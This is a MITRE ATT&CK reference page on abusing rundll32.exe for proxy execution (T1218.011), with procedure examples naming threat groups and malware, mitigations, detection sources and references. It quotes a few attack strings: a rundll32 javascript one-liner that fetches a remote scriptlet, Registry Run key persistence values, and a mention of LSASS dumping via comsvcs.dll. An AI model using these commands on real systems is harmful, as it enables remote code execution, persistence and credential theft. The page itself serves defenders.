Skip to content

T1218.011 Rundll32

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).

Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. 5

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:”..\mshtml,RunHTMLApplication “;document.write();GetObject(“script:https[:]//www[.]example[.]com/malicious.sct”)” This behavior has been seen used by malware such as Poweliks. 3

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.24 DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).

Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.1

Item Value
ID T1218.011
Sub-techniques T1218.001, T1218.002, T1218.003, T1218.004, T1218.005, T1218.007, T1218.008, T1218.009, T1218.010, T1218.011, T1218.012, T1218.013, T1218.014
Tactics TA0005
Platforms Windows
Version 2.1
Created 23 January 2020
Last Modified 21 April 2023

Procedure Examples

ID Name Description
S0045 ADVSTORESHELL ADVSTORESHELL has used rundll32.exe in a Registry value to establish persistence.21
G0073 APT19 APT19 configured its payload to inject into the rundll32.exe.74
G0007 APT28 APT28 executed CHOPSTICK by using rundll32 commands such as rundll32.exe “C:\Windows\twain_64.dll”. APT28 also executed a .dll for a first stage dropper using rundll32.exe. An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.892190919293
G0022 APT3 APT3 has a tool that can run DLLs.73
G0050 APT32 APT32 malware has used rundll32.exe to execute an initial infection process.94
G0082 APT38 APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.78
G0096 APT41 APT41 has used rundll32.exe to execute a loader.83
S0438 Attor Attor‘s installer plugin can schedule rundll32.exe to load the dispatcher.20
S0093 Backdoor.Oldrea Backdoor.Oldrea can use rundll32 for execution on compromised hosts.32
S0606 Bad Rabbit Bad Rabbit has used rundll32 to launch a malicious DLL as C:Windowsinfpub.dat.56
S0268 Bisonal Bisonal has used rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\”vert” = “rundll32.exe c:\windows\temp\pvcu.dll , Qszdez”.38
S0520 BLINDINGCAN BLINDINGCAN has used Rundll32 to load a malicious DLL.15
G0108 Blue Mockingbird Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using rundll32.exe.79
S0635 BoomBox BoomBox can use RunDLL32 for execution.12
S0204 Briba Briba uses rundll32 within Registry Run Keys / Startup Folder entries to execute malicious DLLs.51
S1039 Bumblebee Bumblebee has used rundll32 for execution of the loader component.6362
C0015 C0015 During C0015, the threat actors loaded DLLs via rundll32 using the svchost process.9
C0018 C0018 During C0018, the threat actors used rundll32 to run Mimikatz.101
C0021 C0021 During C0021, the threat actors used rundll32.exe to execute the Cobalt Strike Beacon loader DLL.100
G0008 Carbanak Carbanak installs VNC server software that executes through rundll32.86
S0154 Cobalt Strike Cobalt Strike can use rundll32.exe to load DLL from the command line.11910
S0244 Comnie Comnie uses Rundll32 to load a malicious DLL.44
G0052 CopyKittens CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.84
S0137 CORESHELL CORESHELL is installed via execution of rundll32 with an export named “init” or “InitW.”64
S0046 CozyCar The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component.46
S0255 DDKONG DDKONG uses Rundll32 to ensure only a single instance of itself is running at once.28
S1052 DEADEYE DEADEYE can use rundll32.exe for execution of living off the land binaries (lolbin) such as SHELL32.DLL.39
S0554 Egregor Egregor has used rundll32 during execution.61
S0081 Elise After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe.65
S0082 Emissary Variants of Emissary have used rundll32.exe in Registry values added to establish persistence.43
S0634 EnvyScout EnvyScout has the ability to proxy execution of malicious files with Rundll32.12
S0568 EVILNUM EVILNUM can execute commands and scripts through rundll32.69
S0512 FatDuke FatDuke can execute via rundll32.22
S0267 FELIXROOT FELIXROOT uses Rundll32 for executing the dropper program.1314
S0143 Flame Rundll32.exe is used as a way of executing Flame at the command-line.58
S0381 FlawedAmmyy FlawedAmmyy has used rundll32 for execution.31
S1044 FunnyDream FunnyDream can use rundll32 for execution of its components.6
G0047 Gamaredon Group Gamaredon Group malware has used rundll32 to launch additional malicious components.76
S0032 gh0st RAT A gh0st RAT variant has used rundll32 for execution.71
S0342 GreyEnergy GreyEnergy uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM).14
G0125 HAFNIUM HAFNIUM has used rundll32 to load malicious DLLs.88
S0698 HermeticWizard HermeticWizard has the ability to create a new process using rundll32.18
S1027 Heyoka Backdoor Heyoka Backdoor can use rundll32.exe to gain execution.19
S0260 InvisiMole InvisiMole has used rundll32.exe for execution.47
S0044 JHUHUGIT JHUHUGIT is executed using rundll32.exe.4849
G0094 Kimsuky Kimsuky has used rundll32.exe to execute malicious scripts and malware on a victim’s network.85
S0250 Koadic Koadic can use Rundll32 to execute additional payloads.7
S0356 KONNI KONNI has used Rundll32 to execute its loader for privilege escalation purposes.5960
S0236 Kwampirs Kwampirs uses rundll32.exe in a Registry value added to establish persistence.53
G0032 Lazarus Group Lazarus Group has used rundll32 to execute malicious payloads on a compromised host.82
G0140 LazyScripter LazyScripter has used rundll32.exe to execute Koadic stagers.75
G0059 Magic Hound Magic Hound has used rundll32.exe to execute MiniDump from comsvcs.dll when dumping LSASS memory.77
S0167 Matryoshka Matryoshka uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.50
S0576 MegaCortex MegaCortex has used rundll32.exe to load a DLL for file encryption.45
S1026 Mongall Mongall can use rundll32.exe for execution.19
S0256 Mosquito Mosquito‘s launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.8
G0069 MuddyWater MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.95
S0637 NativeZone NativeZone has used rundll32 to execute a malicious DLL.57
S0353 NOKKI NOKKI has used rundll32 for execution.54
S0368 NotPetya NotPetya uses rundll32.exe to install itself on remote systems when accessed via PsExec or wmic.66
C0022 Operation Dream Job During Operation Dream Job, Lazarus Group executed malware with C:\\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db", CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905.989697
C0005 Operation Spalax During Operation Spalax, the threat actors used rundll32.exe to execute malicious installers.99
S1050 PcShare PcShare has used rundll32.exe for execution.6
S0518 PolyglotDuke PolyglotDuke can be executed using rundll32.exe.22
S0139 PowerDuke PowerDuke uses rundll32.exe to load.70
S0113 Prikormka Prikormka uses rundll32.exe to load its DLL.16
S0147 Pteranodon Pteranodon executes functions using rundll32.exe.72
S0196 PUNCHBUGGY PUNCHBUGGY can load a DLL using Rundll32.67
S0650 QakBot QakBot has used Rundll32.exe to drop malicious DLLs including Brute Ratel C4 and to enable C2 communication.2427252610
S0481 Ragnar Locker Ragnar Locker has used rundll32.exe to execute components of VirtualBox.55
S0148 RTM RTM runs its core DLL file using rundll32.exe.4142
S0074 Sakula Sakula calls cmd.exe to run various DLL files via rundll32.36
G0034 Sandworm Team Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe.80
S0461 SDBbot SDBbot has used rundll32.exe to execute DLLs.31
S0382 ServHelper ServHelper contains a module for downloading and executing DLLs that leverages rundll32.exe.37
S0589 Sibot Sibot has executed downloaded DLLs with rundll32.exe.23
C0024 SolarWinds Compromise During the SolarWinds Compromise, APT29 used Rundll32.exe to execute payloads.10217
S1030 Squirrelwaffle Squirrelwaffle has been executed using rundll32.exe.2930
S0142 StreamEx StreamEx uses rundll32 to call an exported function.52
S0559 SUNBURST SUNBURST used Rundll32 to execute payloads.17
S1064 SVCReady SVCReady has used rundll32.exe for execution.40
G0092 TA505 TA505 has leveraged rundll32.exe to execute malicious DLLs.8137
G0127 TA551 TA551 has used rundll32.exe to load malicious DLLs.87
S0452 USBferry USBferry can execute rundll32.exe in memory to avoid detection.35
S0141 Winnti for Windows The Winnti for Windows installer loads a DLL using rundll32.3334
S0412 ZxShell ZxShell has used rundll32.exe to execute other DLLs and named pipes.68

Mitigations

ID Mitigation Description
M1050 Exploit Protection Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.

Detection

ID Data Source Data Component
DS0017 Command Command Execution
DS0022 File File Metadata
DS0011 Module Module Load
DS0009 Process Process Creation

References

  1. Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022. 

  2. Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021. 

  3. B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018. 

  4. gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021. 

  5. Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017. 

  6. Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022. 

  7. Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018. 

  8. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018. 

  9. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022. 

  10. Kenefick, I. et al. (2022, October 12). Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike. Retrieved February 6, 2023. 

  11. Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021. 

  12. MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021. 

  13. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018. 

  14. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018. 

  15. US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020. 

  16. Cherepanov, A.. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016. 

  17. MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021. 

  18. ESET. (2022, March 1). IsaacWiper and HermeticWizard: New wiper and worm targetingUkraine. Retrieved April 10, 2022. 

  19. Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022. 

  20. Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020. 

  21. Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017. 

  22. Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020. 

  23. Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. 

  24. CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021. 

  25. Cyberint. (2021, May 25). Qakbot Banking Trojan. Retrieved September 27, 2021. 

  26. Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021. 

  27. Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021. 

  28. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018. 

  29. Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022. 

  30. Palazolo, G. (2021, October 7). SquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot. Retrieved August 9, 2022. 

  31. Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022. 

  32. Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021. 

  33. Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017. 

  34. Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. 

  35. Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020. 

  36. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016. 

  37. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019. 

  38. Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018. 

  39. Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022. 

  40. Schlapfer, Patrick. (2022, June 6). A New Loader Gets Ready. Retrieved December 13, 2022. 

  41. Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017. 

  42. Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020. 

  43. Falcone, R. and Miller-Osborn, J. (2016, February 3). Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?. Retrieved February 15, 2016. 

  44. Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018. 

  45. Del Fierro, C. Kessem, L.. (2020, January 8). From Mega to Giga: Cross-Version Comparison of Top MegaCortex Modifications. Retrieved February 15, 2021. 

  46. F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015. 

  47. Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020. 

  48. F-Secure. (2015, September 8). Sofacy Recycles Carberp and Metasploit Code. Retrieved August 3, 2016. 

  49. Mercer, W., et al. (2017, October 22). “Cyber Conflict” Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018. 

  50. Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017. 

  51. Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018. 

  52. Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017. 

  53. Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018. 

  54. Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018. 

  55. SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020. 

  56. Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021. 

  57. Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021. 

  58. sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018. 

  59. Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020. 

  60. Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022. 

  61. Rochberger, L. (2020, November 26). Cybereason vs. Egregor Ransomware. Retrieved December 30, 2020. 

  62. Kamble, V. (2022, June 28). Bumblebee: New Loader Rapidly Assuming Central Position in Cyber-crime Ecosystem. Retrieved August 24, 2022. 

  63. Merriman, K. and Trouerbach, P. (2022, April 28). This isn’t Optimus Prime’s Bumblebee but it’s Still Transforming. Retrieved August 22, 2022. 

  64. Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015. 

  65. Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016. 

  66. Chiu, A. (2016, June 27). New Ransomware Variant “Nyetya” Compromises Systems Worldwide. Retrieved March 26, 2019. 

  67. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018. 

  68. Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019. 

  69. Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved December 22, 2021. 

  70. Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017. 

  71. Sabo, S. (2018, February 15). Musical Chairs Playing Tetris. Retrieved February 19, 2018. 

  72. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017. 

  73. Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016. 

  74. Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018. 

  75. Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. 

  76. Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020. 

  77. DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022. 

  78. DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea’s BeagleBoyz Robbing Banks. Retrieved September 29, 2021. 

  79. Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020. 

  80. Cherepanov, A.. (2017, July 4). Analysis of TeleBots’ cunning backdoor . Retrieved June 11, 2020. 

  81. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019. 

  82. Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved March 2, 2022. 

  83. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. 

  84. ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017. 

  85. An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021. 

  86. Kaspersky Lab’s Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018. 

  87. Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021. 

  88. Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021. 

  89. Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016. 

  90. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018. 

  91. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017. 

  92. ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019. 

  93. NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021. 

  94. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018. 

  95. Kaspersky Lab’s Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018. 

  96. Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021. 

  97. Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021. 

  98. ClearSky Research Team. (2020, August 13). Operation ‘Dream Job’ Widespread North Korean Espionage Campaign. Retrieved December 20, 2021. 

  99. M. Porolli. (2021, January 21). Operation Spalax: Targeted malware attacks in Colombia. Retrieved September 16, 2022. 

  100. Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018. 

  101. Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023. 

  102. MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.